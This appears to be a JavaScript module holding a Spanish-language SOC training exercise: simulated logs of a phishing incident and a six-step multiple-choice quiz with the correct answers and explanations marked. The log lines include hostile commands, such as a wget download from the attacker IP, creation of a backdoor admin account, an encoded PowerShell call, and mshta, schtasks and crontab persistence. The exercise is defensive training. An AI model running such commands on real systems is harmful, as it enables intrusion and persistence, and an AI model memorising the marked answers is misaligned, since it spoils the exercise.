module.exports = `
  {
    id: "phishing-credentials",
    title: "Phishing y robo de credenciales",
    severity: "high",
    description:
      "Microsoft Defender detectó un correo phishing dirigido a Sofía Ramírez que contenía un enlace malicioso. Sofía hizo clic en el enlace y sus credenciales de dominio fueron capturadas. Posteriormente se detectó uso de esas credenciales desde una IP no registrada.",
    alertSource: "Microsoft Defender + Wazuh Rule 11200",
    alertTime: "2026-08-24 10:15:33 UTC",
    logs: [
      { line: 1, timestamp: "Aug 24 09:30:05", source: "srv-mail-01 postfix/smtpd", message: "connect from mail-relay.external[203.0.113.80]", severity: "info", flagged: false },
      { line: 2, timestamp: "Aug 24 09:30:12", source: "srv-mail-01 postfix/cleanup", message: "BA7C1E03: message-id=<20260824093005.ABC123@mail-relay.external>", severity: "info", flagged: false },
      { line: 3, timestamp: "Aug 24 09:30:15", source: "srv-mail-01 postfix/qmgr", message: "BA7C1E03: from=<noreply@microsft-security.com>, size=4521, nrcpt=1 (queue active)", severity: "warning", flagged: true },
      { line: 4, timestamp: "Aug 24 09:31:20", source: "srv-web-01 nginx.access", message: "GET /api/health 200 -- 10.10.2.44 -- Lucía Fernández Dev", severity: "info", flagged: false },
      { line: 5, timestamp: "Aug 24 09:32:00", source: "srv-monitor cron", message: "Health check: srv-web-01 -- CPU 18% -- RAM 42% -- Disk 61%", severity: "info", flagged: false },
      { line: 6, timestamp: "Aug 24 09:33:10", source: "srv-web-01 node.app", message: "Queue processor: 89 jobs completed, 12 pending", severity: "info", flagged: false },
      { line: 7, timestamp: "Aug 24 09:34:22", source: "ws-sofia-01 outlook", message: "Email delivered to Inbox: 'Re: Urgente - Actualizacion de seguridad requerida' from noreply@microsft-security.com", severity: "warning", flagged: true },
      { line: 8, timestamp: "Aug 24 09:35:00", source: "srv-web-01 nginx.access", message: "POST /api/payments/process 201 -- 10.10.3.10 -- Sofia Ramirez Ops", severity: "info", flagged: false },
      { line: 9, timestamp: "Aug 24 09:36:15", source: "srv-mail-01 postfix/smtp", message: "BA7C1E04: to=<admin@corp.local>, relay=none, delay=0.08, dsn=2.0.0, status=sent (250 OK)", severity: "info", flagged: false },
      { line: 10, timestamp: "Aug 24 09:37:30", source: "srv-web-01 sshd[22601]", message: "Accepted publickey for diego from 10.10.1.20 port 49901 ssh2", severity: "info", flagged: false },
      { line: 11, timestamp: "Aug 24 09:38:00", source: "srv-monitor cron", message: "Metric aggregation: 7,832 events -- avg latency 11ms", severity: "info", flagged: false },
      { line: 12, timestamp: "Aug 24 09:39:45", source: "srv-web-01 nginx.access", message: "GET /dashboard 200 -- 10.10.1.20 -- Diego López SOC", severity: "info", flagged: false },
      { line: 13, timestamp: "Aug 24 09:40:10", source: "srv-web-01 node.app", message: "SSL certificate renewal check -- expires in 21 days", severity: "info", flagged: false },
      { line: 14, timestamp: "Aug 24 09:41:30", source: "srv-web-01 nginx.access", message: "GET /api/orders/history 200 -- 10.10.3.22 -- Carlos Ruiz Corp", severity: "info", flagged: false },
      { line: 15, timestamp: "Aug 24 09:42:00", source: "srv-monitor cron", message: "Health check: srv-app-01 -- CPU 35% -- RAM 52% -- Disk 69%", severity: "info", flagged: false },
      { line: 16, timestamp: "Aug 24 09:43:15", source: "ws-sofia-01 sysmon", message: "ProcessCreate: chrome.exe -- navigated to https://portal-microsft.com/auth/update?token=BA7C1E03", severity: "warning", flagged: true },
      { line: 17, timestamp: "Aug 24 09:43:22", source: "ws-sofia-01 sysmon", message: "NetworkConnection: chrome.exe -> 198.51.100.44:443 (HTTPS)", severity: "warning", flagged: true },
      { line: 18, timestamp: "Aug 24 09:43:45", source: "ws-sofia-01 sysmon", message: "FileCreate: C:\\\\Users\\\\sofia\\\\AppData\\\\Local\\\\Temp\\\\login.html (phishing page rendered)", severity: "warning", flagged: true },
      { line: 19, timestamp: "Aug 24 09:44:02", source: "ws-sofia-01 sysmon", message: "ProcessCreate: chrome.exe -- POST to https://portal-microsft.com/auth/collect (credentials submitted)", severity: "critical", flagged: true },
      { line: 20, timestamp: "Aug 24 09:44:10", source: "ws-sofia-01 sysmon", message: "NetworkConnection: chrome.exe -> 198.51.100.44:443 (credential exfil)", severity: "critical", flagged: true },
      { line: 21, timestamp: "Aug 24 09:45:00", source: "srv-web-01 nginx.access", message: "POST /api/reports/generate 202 -- 10.10.1.15 -- Martin Gonzalez Admin", severity: "info", flagged: false },
      { line: 22, timestamp: "Aug 24 09:46:30", source: "srv-mail-01 postfix/qmgr", message: "BA7C1E05: from=<alerts@monitoring.local>, size=1102, nrcpt=1 (queue active)", severity: "info", flagged: false },
      { line: 23, timestamp: "Aug 24 09:47:00", source: "srv-web-01 sshd[22610]", message: "Accepted publickey for sofia from 10.10.3.10 port 50001 ssh2", severity: "info", flagged: false },
      { line: 24, timestamp: "Aug 24 09:48:15", source: "srv-web-01 nginx.access", message: "GET /api/health 200 -- 10.10.2.44 -- Lucía Fernández Dev", severity: "info", flagged: false },
      { line: 25, timestamp: "Aug 24 09:49:30", source: "srv-monitor cron", message: "Health check: srv-db-01 -- CPU 6% -- RAM 38% -- Disk 64%", severity: "info", flagged: false },
      { line: 26, timestamp: "Aug 24 09:50:00", source: "srv-web-01 node.app", message: "Queue processor: 104 jobs completed, 15 pending", severity: "info", flagged: false },
      { line: 27, timestamp: "Aug 24 09:51:10", source: "srv-web-01 kernel", message: "[UFW BLOCK] IN=eth0 SRC=192.0.2.33 DST=10.10.1.10 PROTO=TCP SPT=8080 DPT=443", severity: "info", flagged: false },
      { line: 28, timestamp: "Aug 24 09:52:30", source: "ws-sofia-01 sysmon", message: "ProcessCreate: powershell.exe -- Invoke-WebRequest -Uri https://portal-microsft.com/auth/verify -UseBasicParsing", severity: "critical", flagged: true },
      { line: 29, timestamp: "Aug 24 09:52:45", source: "ws-sofia-01 sysmon", message: "NetworkConnection: powershell.exe -> 198.51.100.44:443 (C2 verification)", severity: "critical", flagged: true },
      { line: 30, timestamp: "Aug 24 09:53:00", source: "ws-sofia-01 sysmon", message: "ProcessCreate: mshta.exe -- payload.hta (persistence mechanism)", severity: "critical", flagged: true },
      { line: 31, timestamp: "Aug 24 09:54:15", source: "ws-sofia-01 sysmon", message: "ScheduledTaskCreate: schtasks /create /tn SecurityUpdate /tr C:\\\\Users\\\\sofia\\\\AppData\\\\Local\\\\Temp\\\\payload.hta /sc daily /st 09:00", severity: "critical", flagged: true },
      { line: 32, timestamp: "Aug 24 09:55:00", source: "srv-web-01 nginx.access", message: "GET /api/products?page=1 200 -- 10.10.3.10 -- Sofia Ramirez Ops", severity: "info", flagged: false },
      { line: 33, timestamp: "Aug 24 09:56:30", source: "srv-mail-01 postfix/smtp", message: "BA7C1E06: to=<team@corp.local>, relay=mail.corp.local[10.10.5.10], delay=0.11, status=sent (250 OK)", severity: "info", flagged: false },
      { line: 34, timestamp: "Aug 24 10:00:05", source: "ws-sofia-01 sysmon", message: "NetworkConnection: chrome.exe -> 198.51.100.44:443 (C2 beacon -- credentials validated)", severity: "critical", flagged: true },
      { line: 35, timestamp: "Aug 24 10:01:10", source: "ws-sofia-01 sysmon", message: "ProcessCreate: cmd.exe /c whoami /all > C:\\\\Users\\\\sofia\\\\AppData\\\\Local\\\\Temp\\\\enum.txt", severity: "critical", flagged: true },
      { line: 36, timestamp: "Aug 24 10:01:20", source: "ws-sofia-01 sysmon", message: "ProcessCreate: cmd.exe /c net group Domain Admins /domain", severity: "critical", flagged: true },
      { line: 37, timestamp: "Aug 24 10:01:35", source: "ws-sofia-01 sysmon", message: "FileCreate: C:\\\\Users\\\\sofia\\\\AppData\\\\Local\\\\Temp\\\\enum.txt (recon output)", severity: "critical", flagged: true },
      { line: 38, timestamp: "Aug 24 10:02:00", source: "ws-sofia-01 sysmon", message: "NetworkConnection: chrome.exe -> 198.51.100.44:443 (upload enum results)", severity: "critical", flagged: true },
      { line: 39, timestamp: "Aug 24 10:03:15", source: "ws-sofia-01 sysmon", message: "ProcessCreate: powershell.exe -enc SQBmACgAJABj... (lateral movement attempt)", severity: "critical", flagged: true },
      { line: 40, timestamp: "Aug 24 10:03:30", source: "ws-sofia-01 sysmon", message: "NetworkConnection: powershell.exe -> 10.10.5.20:445 (SMB to srv-db-01)", severity: "critical", flagged: true },
      { line: 41, timestamp: "Aug 24 10:04:00", source: "srv-web-01 nginx.access", message: "POST /api/payments/process 200 -- 10.10.3.10 -- Sofia Ramirez Ops", severity: "info", flagged: false },
      { line: 42, timestamp: "Aug 24 10:05:30", source: "srv-monitor cron", message: "Health check: srv-web-01 -- CPU 22% -- RAM 46% -- Disk 61%", severity: "info", flagged: false },
      { line: 43, timestamp: "Aug 24 10:06:15", source: "srv-web-01 sshd[22650]", message: "Accepted publickey for carlos from 10.10.3.22 port 50101 ssh2", severity: "info", flagged: false },
      { line: 44, timestamp: "Aug 24 10:07:00", source: "srv-web-01 node.app", message: "Cache hit ratio: 93.8% -- Redis memory: 289MB/512MB", severity: "info", flagged: false },
      { line: 45, timestamp: "Aug 24 10:08:30", source: "srv-web-01 nginx.access", message: "GET /api/health 200 -- 10.10.1.15 -- Martin Gonzalez Admin", severity: "info", flagged: false },
      { line: 46, timestamp: "Aug 24 10:09:45", source: "srv-monitor cron", message: "Metric aggregation: 9,102 events -- avg latency 12ms", severity: "info", flagged: false },
      { line: 47, timestamp: "Aug 24 10:10:00", source: "ws-sofia-01 sysmon", message: "ProcessCreate: cmd.exe /c net user svc-backdoor P@ssw0rd2026! /add", severity: "critical", flagged: true },
      { line: 48, timestamp: "Aug 24 10:10:15", source: "ws-sofia-01 sysmon", message: "ProcessCreate: cmd.exe /c net localgroup administrators svc-backdoor /add", severity: "critical", flagged: true },
      { line: 49, timestamp: "Aug 24 10:10:30", source: "ws-sofia-01 sysmon", message: "NetworkConnection: chrome.exe -> 198.51.100.44:443 (C2 -- user created)", severity: "critical", flagged: true },
      { line: 50, timestamp: "Aug 24 10:11:00", source: "srv-web-01 nginx.access", message: "GET /api/orders/history 200 -- 10.10.3.10 -- Sofia Ramirez Ops", severity: "info", flagged: false },
      { line: 51, timestamp: "Aug 24 10:12:15", source: "srv-web-01 sshd[22660]", message: "Accepted password for sofia from 198.51.100.44 port 50201 ssh2", severity: "critical", flagged: true },
      { line: 52, timestamp: "Aug 24 10:12:30", source: "srv-web-01 sudo: sofia", message: "TTY=pts/1 ; PWD=/home/sofia ; USER=root ; COMMAND=/usr/bin/cat /etc/passwd", severity: "critical", flagged: true },
      { line: 53, timestamp: "Aug 24 10:13:00", source: "srv-web-01 sshd[22665]", message: "Accepted password for sofia from 198.51.100.44 port 50301 ssh2", severity: "critical", flagged: true },
      { line: 54, timestamp: "Aug 24 10:13:30", source: "srv-web-01 kernel", message: "[UFW BLOCK] IN=eth0 SRC=198.51.100.44 DST=10.10.5.20 PROTO=TCP SPT=50301 DPT=5432", severity: "warning", flagged: true },
      { line: 55, timestamp: "Aug 24 10:14:00", source: "srv-web-01 wget", message: "connecting to 198.51.100.44:8080 -- downloading toolkit.tar.gz -- saved to /tmp/.update_helper", severity: "critical", flagged: true },
      { line: 56, timestamp: "Aug 24 10:14:30", source: "srv-web-01 useradd", message: "new user 'svc-monitor' (uid=1006) added to /etc/passwd", severity: "critical", flagged: true },
      { line: 57, timestamp: "Aug 24 10:15:00", source: "srv-web-01 crond", message: "new crontab entry: 0 3 * * * /tmp/.update_helper --silent", severity: "critical", flagged: true },
      { line: 58, timestamp: "Aug 24 10:15:33", source: "srv-monitor alert", message: "Microsoft Defender: Phishing credential reuse detected -- sofia account used from external IP 198.51.100.44", severity: "critical", flagged: true },
    ],
    playbook: [],
    steps: [
      {
        id: "identify",
        title: "Paso 1 -- Identificar los logs relevantes",
        description: "Revisá el log del incidente de phishing. ¿Qué líneas son parte del ataque?",
        hint: "Seguí el correo phishing desde la entrega hasta la explotación.",
        options: [
          {
            id: "a",
            label: "Solo las líneas 3 y 7 (el correo phishing y su entrega)",
            correct: false,
            explanation: "El correo es solo el vector inicial. Necesitás ver la cadena completa: clic en el enlace, robo de credenciales, uso de credenciales robadas, movimiento lateral, y persistencia.",
            consequence: "En un SOC real, reportar solo el phishing sin ver la explotación significa que el equipo no detecta que las credenciales ya fueron usadas para acceder al servidor web y crear usuarios backdoor.",
          },
          {
            id: "b",
            label: "Líneas 3, 7, 16-20, 28-31, 34-40, 47-58 (cadena completa del ataque)",
            correct: true,
            explanation: "Correcto. La secuencia es: correo phishing entregado, clic en enlace, robo de credenciales, verificación C2, reconocimiento, intento de lateral movement, credenciales usadas desde IP externa, creación de usuarios, persistencia.",
          },
          {
            id: "c",
            label: "Todas las líneas del log (1-58)",
            correct: false,
            explanation: "Las líneas normales incluyen activity de Lucía, Carlos, Diego, health checks y otros usuarios legítimos. No son parte del incidente. Incluir todo dificulta el análisis.",
            consequence: "En un SOC real, entregar un reporte con 58 líneas donde la mitad es tráfico legítimo hace que el equipo de contención pierda horas investigando usuarios inocentes mientras el atacante sigue activo.",
          },
          {
            id: "d",
            label: "Solo la línea 16 (la navegación al sitio phishing)",
            correct: false,
            explanation: "La navegación es el punto de entrada, pero sin ver la exfiltración de credenciales, el uso de esas credenciales desde IP externa, y la persistencia instalada, no dimensionás el alcance del compromiso.",
            consequence: "En un SOC real, reportar solo el clic en el enlace sin ver la explotación posterior hace que el equipo trate esto como un intento fallido cuando en realidad las credenciales ya fueron comprometidas y el atacante tiene acceso activo.",
          },
        ],
      },
      {
        id: "assign",
        title: "Paso 2 -- Asignar el incidente",
        description: "¿Quién debería tomar este caso? Considerá que hay credenciales comprometidas y movimiento lateral activo.",
        hint: "Pensá en qué servidores están afectados y quién tiene acceso de administración.",
        options: [
          {
            id: "a",
            label: "Sofía Ramírez (Gerente de Operaciones) -- ella es la víctima",
            correct: false,
            explanation: "Sofía es la víctima del phishing, no la respuesta. Ella no tiene permisos técnicos para contener el incidente y su cuenta ya está comprometida. Asignarle el caso es un riesgo de seguridad.",
            consequence: "En un SOC real, dar acceso de administración a una cuenta comprometida para 'arreglar' el problema es como dar las llaves al ladrón. El atacante puede monitorear todas las acciones desde la cuenta de Sofía.",
          },
          {
            id: "b",
            label: "Diego López (SOC L2) para investigación + Ana Martínez (DevOps) para contención + escalamiento a CISO",
            correct: true,
            explanation: "Correcto. El incidente requiere investigación (Diego), contención técnica (Ana -- revocar credenciales, bloquear IP, aislar cuentas), y escalamiento porque hay movimiento lateral y persistencia activa.",
          },
          {
            id: "c",
            label: "Martín González (SysAdmin) -- que cambie la contraseña de Sofía",
            correct: false,
            explanation: "Cambiar la contraseña de Sofía no detiene al atacante que ya tiene persistencia en la máquina. El malware sigue activo y capturará la nueva contraseña. Se necesita aislar la workstation primero.",
            consequence: "En un SOC real, cambiar la contraseña sin aislar la workstation es inútil: el keylogger captura la nueva contraseña y el atacante sigue teniendo acceso completo.",
          },
          {
            id: "d",
            label: "Carlos Ruiz (Analista Financiero) -- que revise si hay datos financieros afectados",
            correct: false,
            explanation: "Carlos no tiene acceso técnico a srv-web-01 ni conocimiento de seguridad. Su involvement sería solo DESPUÉS de la contención, si se confirma que datos financieros fueron comprometidos.",
            consequence: "En un SOC real, asignar un incidente activo de seguridad a un analista financiero retrasa la contención horas. Mientras Carlos revisa spreadsheets, el atacante sigue moviéndose lateralmente.",
          },
        ],
      },
      {
        id: "playbook",
        title: "Paso 3 -- Consultar el playbook",
        description: "El playbook está vacío. Basándote en tu conocimiento de respuesta a incidentes de phishing, ¿cuál es la PRIMERA acción de contención?",
        hint: "Pensá en qué hacer con la cuenta comprometida y la máquina afectada.",
        options: [
          {
            id: "a",
            label: "Cambiar la contraseña de Sofía y seguir monitoreando",
            correct: false,
            explanation: "Cambiar la contraseña no es suficiente cuando hay persistencia en la máquina. El malware capturará la nueva contraseña y el atacante ya tiene usuarios backdoor creados.",
            consequence: "En un SOC real, cambiar la contraseña sin aislar la máquina es como cambiar la cerradura mientras el ladrón está adentro. Sigue teniendo acceso por otras puertas.",
          },
          {
            id: "b",
            label: "Desactivar la cuenta de Sofía, aislar ws-sofia-01 de la red, y bloquear la IP 198.51.100.44 en el firewall perimetral",
            correct: true,
            explanation: "Correcto. La contención de phishing requiere: 1) desactivar la cuenta comprometida para cortar acceso, 2) aislar la workstation para detener el malware, 3) bloquear la IP del atacante. En ese orden.",
          },
          {
            id: "c",
            label: "Reinstalar el sistema operativo en ws-sofia-01",
            correct: false,
            explanation: "Reinstalar es una acción de remediación, no de contención. Primero se aisla y se contiene. La reinstalación se hace después del forense. Además, sin imagen forense se pierde evidencia.",
            consequence: "En un SOC real, reinstalar sin forense destruye evidencia clave: qué datos se robaron, qué usuarios backdoor se crearon, y qué persistencia se instaló. Sin esto, no se puede determinar el alcance completo.",
          },
          {
            id: "d",
            label: "Enviar un correo a todos los empleados sobre phishing",
            correct: false,
            explanation: "La comunicación es importante, pero es una acción de concientización, no de contención. Primero se contiene el incidente activo, luego se comunica al resto de la organización.",
            consequence: "En un SOC real, priorizar la comunicación sobre la contención permite que el atacante siga explotando. Otros empleados pueden recibir phishing similar, pero la prioridad es cortar el acceso activo.",
          },
        ],
      },
      {
        id: "classify",
        title: "Paso 4 -- Clasificar la alerta",
        description: "¿Cuál es la clasificación correcta de este incidente?",
        hint: "Considerá: phishing exitoso, credenciales robadas, acceso externo, usuarios creados, persistencia.",
        options: [
          {
            id: "a",
            label: "Falso positivo -- Sofía probablemente se confundió con un correo legítimo",
            correct: false,
            explanation: "Aunque Sofía fue la víctima del phishing, el impacto real es que las credenciales fueron robadas y usadas para acceder al servidor, crear usuarios backdoor e instalar persistencia. Esto es un compromiso activo.",
            consequence: "En un SOC real, tratar phishing exitoso como 'error humano sin impacto' ignora que el atacante ya tiene acceso al servidor, usuarios creados, y malware persistente operando activamente.",
          },
          {
            id: "b",
            label: "Positivo verdadero -- Phishing con robo de credenciales y compromiso confirmado",
            correct: true,
            explanation: "Correcto. La cadena de evidencia es completa: phishing, robo de credenciales, acceso desde IP externa, reconocimiento, creación de usuarios, persistencia. El atacante tiene acceso activo al servidor.",
          },
          {
            id: "c",
            label: "Requiere investigación -- no sabemos si Sofía dio clic voluntariamente",
            correct: false,
            explanation: "Da igual si fue voluntario o no. Las credenciales fueron comprometidas y ya se están usando desde una IP externa. La intención de Sofía no cambia el hecho de que hay un compromiso activo.",
            consequence: "En un SOC real, debatir la culpa de la víctima mientras el atacante sigue activo es un error de priorización. La clasificación debe basarse en evidencia técnica, no en intención humana.",
          },
        ],
      },
      {
        id: "writeup",
        title: "Paso 5 -- Redacción del reporte",
        description: "Escribí el reporte del incidente. ¿Cuál es la redacción correcta?",
        hint: "Incluí: vector de ataque, credenciales comprometidas, servidores afectados, y acciones.",
        options: [
          {
            id: "a",
            label: "Sofía hizo clic en un phishing. Hay que cambiar su contraseña.",
            correct: false,
            explanation: "Demasiado vago. No menciona el servidor comprometido, los usuarios creados, la persistencia, ni las acciones de contención necesarias.",
            consequence: "En un SOC real, un reporte así hace que el equipo subestime la gravedad. No detectarán que hay usuarios backdoor activos y malware persistente en srv-web-01.",
          },
          {
            id: "b",
            label: "Phishing exitoso contra Sofía Ramírez (Ops) -- credenciales de dominio comprometidas via portal-microsft.com (198.51.100.44). Credenciales usadas desde IP externa para acceder a srv-web-01 vía SSH (10:12:15 UTC). Post-acceso: lectura de /etc/passwd, creación de usuario 'svc-monitor' (uid=1006), descarga de toolkit a /tmp/.update_helper, crontab persistente (0 3 * * *). Intento de lateral movement a srv-db-01 bloqueado por UFW. Impacto: compromiso de srv-web-01 con persistencia. Acciones requeridas: desactivar cuenta sofia, aislar ws-sofia-01, bloquear IP 198.51.100.44, eliminar usuario svc-monitor, remover crontab, forense de ws-sofia-01.",
            correct: true,
            explanation: "Reporte completo: QUÉ (phishing + credenciales comprometidas), CÓMO (portal-microsft.com), QUÉ SE AFECTÓ (srv-web-01), POST-ACCESO (usuarios creados, persistencia, toolkit), IMPACTO, y ACCIONES concretas. Formato profesional SOC.",
          },
          {
            id: "c",
            label: "Un empleado abrió un correo malo y hackearon el servidor. Hay que poner mejor antivirus.",
            correct: false,
            explanation: "Lenguaje informal sin datos técnicos. 'Mejor antivirus' no es una acción de contención. No hay IP, timestamp, servidor específico, ni plan de remediación.",
            consequence: "En un SOC real, este tipo de reporte no permite ninguna acción de contención. El equipo no sabe qué bloquear, qué servidor aislar, ni qué usuarios eliminar.",
          },
        ],
      },
      {
        id: "return",
        title: "Paso 6 -- Volver al panel",
        description: "Incidente documentado y escalado. ¿Qué sigue en tu flujo de trabajo?",
        hint: "Pensá en qué queda pendiente mientras otros equipos ejecutan la contención.",
        options: [
          {
            id: "a",
            label: "Cerrar el caso -- ya está todo documentado",
            correct: false,
            explanation: "Un caso de phishing con persistencia activa no se cierra sin verificar que: la cuenta fue desactivada, la workstation aislada, el usuario backdoor eliminado, y el crontab removido.",
            consequence: "En un SOC real, cerrar sin verificar remediación significa que el usuario 'svc-backdoor' sigue activo y el crontab sigue ejecutando malware cada día a las 3 AM.",
          },
          {
            id: "b",
            label: "Volver al panel de logs para monitorear si hay más activity del atacante mientras DevOps ejecuta la contención",
            correct: true,
            explanation: "Correcto. Tu rol es vigilancia continua: ¿hay más workstations comprometidas? ¿el atacante tiene otros puntos de acceso? ¿la contención está funcionando? Mientras Ana ejecuta, vos monitoreás.",
          },
          {
            id: "c",
            label: "Ir a hablar con Sofía para entender por qué hizo clic en el enlace",
            correct: false,
            explanation: "La entrevista a la víctima es parte del proceso, pero no es prioridad durante la contención activa. Primero se contiene el incidente, luego se hace la entrevista para mejorar la concientización.",
            consequence: "En un SOC real, priorizar la entrevista sobre la contención da tiempo al atacante para instalar más persistencia o moverse a otros sistemas.",
          },
        ],
      },
    ],
    summary: "Phishing exitoso contra Sofía Ramírez resultó en robo de credenciales de dominio. El atacante usó las credenciales para acceder a srv-web-01, crear usuario backdoor 'svc-monitor', instalar crontab persistente, y descargar toolkit de explotación. Intento de lateral movement a srv-db-01 bloqueado por UFW. Clasificación: POSITIVO VERDADERO -- Compromiso con persistencia activa.",
  },`;
